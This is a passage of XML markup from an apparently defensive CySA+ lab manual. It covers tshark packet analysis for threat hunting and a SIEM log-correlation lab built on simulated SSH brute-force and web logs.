        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh /tmp/sample.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-w writes a pcap, -G 10 -W 1 rotates after 10 seconds and stops.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Extract DNS queries from the pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tshark -r /tmp/sample.pcap -Y 'dns.flags.response==0' -T fields -e dns.qry.name | sort -u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In a threat hunt this is how you spot DGA-style randomised domains, DNS tunnelling, or queries to known-bad domains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Extract HTTP host headers and URIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tshark -r /tmp/sample.pcap -Y http.request -T fields -e http.host -e http.request.uri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cleartext HTTP requests reveal command-and-control URLs, downloaded second stages, and exfiltration endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Extract TLS SNI (server name indicator)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tshark -r /tmp/sample.pcap -Y 'tls.handshake.type==1' -T fields -e tls.handshake.extensions_server_name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Even when payloads are encrypted, the SNI in the ClientHello tells you which host the client tried to reach — the single most useful field for TLS-era hunting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Top talkers / conversations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tshark -r /tmp/sample.pcap -q -z conv,ip | head -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The output ranks IP pairs by bytes. A workstation talking 500 MB to an unfamiliar IP is a candidate exfiltration channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Apply a display filter while sniffing live</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tshark -i any -Y 'dns and ip.dst==8.8.8.8' -c 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Display filters (Wireshark-style) are richer than BPF; they can match application-layer fields like http.user_agent or dns.qry.name contains "tor".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Hunt a specific IOC across a pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Imagine your threat-intel feed flags 93.184.216.34:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tshark -r /tmp/sample.pcap -Y 'ip.addr==93.184.216.34' -T fields -e frame.time -e ip.src -e ip.dst -e _ws.col.Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You now have every packet, every protocol, every timestamp touching that IP — directly feeding the incident timeline (Lab 27).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to capture to a rotating pcap with tcpdump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to extract DNS, HTTP, and TLS SNI fields with tshark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to rank top talkers and pivot on a specific IOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The CySA+ 1.3 muscle memory for any packet-capture exam question.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PCAP Analyzer (https://alfredang.github.io/pcapanalyzer/) — a browser tool that parses .pcap/.pcapng files and shows protocols, top talkers and packet detail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Load your threat-hunting capture into the PCAP Analyzer to triage protocols and top talkers visually before you drill into individual packets with tshark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to how to capture to a rotating pcap with tcpdump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 7 — SIEM Log Correlation</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play the role of a SIEM: ingesting raw logs from multiple sources, normalising them, and correlating fields to detect a brute-force-then-success login pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will play the role of a SIEM: ingesting raw logs from multiple sources, normalising them, and correlating fields to detect a brute-force-then-success login pattern. You will use the universal Unix data-pipeline trio — grep, awk, jq — which is enough to prototype any SOAR / SIEM rule before deploying it to Splunk or Elastic. (CySA+ 1.3 — SIEM, SOAR, Log analysis/correlation.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools and seed sample logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y jq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab7 &amp;&amp; cd /tmp/lab7</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cat &gt; auth.log &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:01 host1 sshd[1001]: Failed password for root from 203.0.113.7 port 5001 ssh2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:02 host1 sshd[1002]: Failed password for root from 203.0.113.7 port 5002 ssh2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:03 host1 sshd[1003]: Failed password for root from 203.0.113.7 port 5003 ssh2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:04 host1 sshd[1004]: Failed password for root from 203.0.113.7 port 5004 ssh2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:05 host1 sshd[1005]: Failed password for root from 203.0.113.7 port 5005 ssh2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:06 host1 sshd[1006]: Accepted password for root from 203.0.113.7 port 5006 ssh2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:30 host1 sshd[1010]: Failed password for alice from 198.51.100.4 port 6001 ssh2</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cat &gt; web.log &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:07 203.0.113.7 GET /admin 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:00:08 203.0.113.7 POST /upload.php 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2026-05-13T08:01:00 198.51.100.4 GET / 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Extract structured fields with awk (parsing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>awk '/Failed password/ {print $1, $(NF-3)}' auth.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Output: timestamp + source IP. This is the parsing layer of any SIEM — turning unstructured text into fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Count failures per IP (aggregation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep "Failed password" auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -nr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is the core SIEM aggregation: 5  203.0.113.7, 1  198.51.100.4. Anything above your threshold (e.g. 5 in 60 s) becomes a candidate alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Correlate failed brute-force with successful login (rule logic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bad_ip=$(grep "Failed password" auth.log | awk '{print $(NF-3)}' | sort | uniq -c | awk '$1&gt;=5{print $2}')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "Suspect IP: $bad_ip"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep "Accepted" auth.log | grep "$bad_ip"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If the same IP that produced ≥ 5 failures ever produces an Accepted — that is a confirmed credential-stuffing success. This is exactly how Splunk/Elastic correlation rules work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Pivot to a second data source (web logs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep "$bad_ip" web.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>We now know the attacker authenticated and immediately hit /admin and uploaded a file — likely a web shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Work with structured JSON logs (jq)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Suricata, Zeek, AWS CloudTrail, and most modern tools emit JSON. Try jq:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; events.json &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"ts":"2026-05-13T08:00:01","src":"203.0.113.7","event":"ssh_fail","user":"root"}</w:t>
